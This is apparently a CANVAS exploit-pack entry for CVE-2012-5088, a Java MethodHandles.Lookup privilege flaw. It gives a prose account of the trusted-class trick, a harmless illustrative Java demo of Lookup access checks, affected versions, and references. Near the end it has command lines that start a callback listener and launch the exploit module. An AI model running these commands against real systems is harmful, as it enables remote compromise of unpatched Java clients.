Immunity, Inc.
Name java_CVE_2012_5088
CVE CVE-2012-5088
Exploit Pack CANVAS
Description Java MethodHandles.Lookup Remote Code Execution
Notes CVE Name: CVE-2012-5088
VENDOR: Sun
Notes:
The exploit abuses the bug patched as CVE-2012-5088, which allows reflection to be performed with full privileges. We obtain an instance of java.lang.invoke.MethodHandles.Lookup by calling the static method java.lang.invoke.MethodHandles.lookup() through the AverageRangeStatisticImpl class, which is part of the JDK. The immediate caller of lookup() is therefore a "trusted" JDK class, so the returned Lookup object carries that class's full access privileges instead of those of the untrusted code that triggered the call.
That Lookup is then combined with the AnonymousClassLoader technique to fully exploit the target.
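The following is an added illustration and is not code from the CANVAS module or from the JDK. It shows the access model the bug subverts: a MethodHandles.Lookup is bound to the class that called lookup() (its lookup class) and may only resolve members that class itself could access, while publicLookup() is limited to public members. The class and method names are hypothetical. On a patched JDK, untrusted code can never obtain a Lookup whose lookup class is a JDK class; on the affected builds, routing the lookup() call through the trusted JDK class named above yielded a Lookup that passes these same checks for private JDK members.

```java
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;

// Hypothetical demo class (added example, not part of the CANVAS module).
public class LookupPrivilegeDemo {

    // A private member that only a Lookup with PRIVATE access on this class may resolve.
    private static String secret() {
        return "private-of-lookup-class";
    }

    public static void main(String[] args) throws Throwable {
        // lookup() is caller-sensitive: the Lookup it returns is bound to the
        // calling class (LookupPrivilegeDemo) and carries that class's access modes,
        // including PRIVATE, so it can resolve secret().
        MethodHandles.Lookup mine = MethodHandles.lookup();
        System.out.println("lookup class: " + mine.lookupClass().getName());
        System.out.println("has PRIVATE mode: "
                + ((mine.lookupModes() & MethodHandles.Lookup.PRIVATE) != 0));

        MethodHandle mh = mine.findStatic(LookupPrivilegeDemo.class, "secret",
                MethodType.methodType(String.class));
        System.out.println("own lookup resolved private method: " + (String) mh.invokeExact());

        // publicLookup() is not bound to the caller and has only public access,
        // so the same resolution is refused. This is the check that a Lookup
        // "owned" by a trusted JDK class would instead pass for JDK-internal members.
        MethodHandles.Lookup pub = MethodHandles.publicLookup();
        try {
            pub.findStatic(LookupPrivilegeDemo.class, "secret",
                    MethodType.methodType(String.class));
            System.out.println("unexpected: public lookup resolved a private method");
        } catch (IllegalAccessException e) {
            System.out.println("public lookup refused: " + e.getMessage());
        }
    }
}
```

Compile and run with `javac LookupPrivilegeDemo.java && java LookupPrivilegeDemo` on any JDK 7 or later; the point of interest is that the privileges of a Lookup are decided entirely by which class called lookup(), which is exactly what the trusted-intermediary trick above manipulates.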

Affected versions
JDK and JRE 7 Update 7 and earlier

Tested on:
- Windows 7 with JDK/JRE 7 update 7
- Ubuntu 11.10 with JDK/JRE 7 update 7
- Ubuntu 11.10 with JDK/JRE 7 update 6

To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_CVE_2012_5088 -O allowed_recon_modules:js_recon -O auto_detect_exploits:0


Repeatability: Infinite (client side - no crash)
References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5088
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5088
http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html
Date public: 16/10/2012

Learn more about the CANVAS Exploit Pack here: CANVAS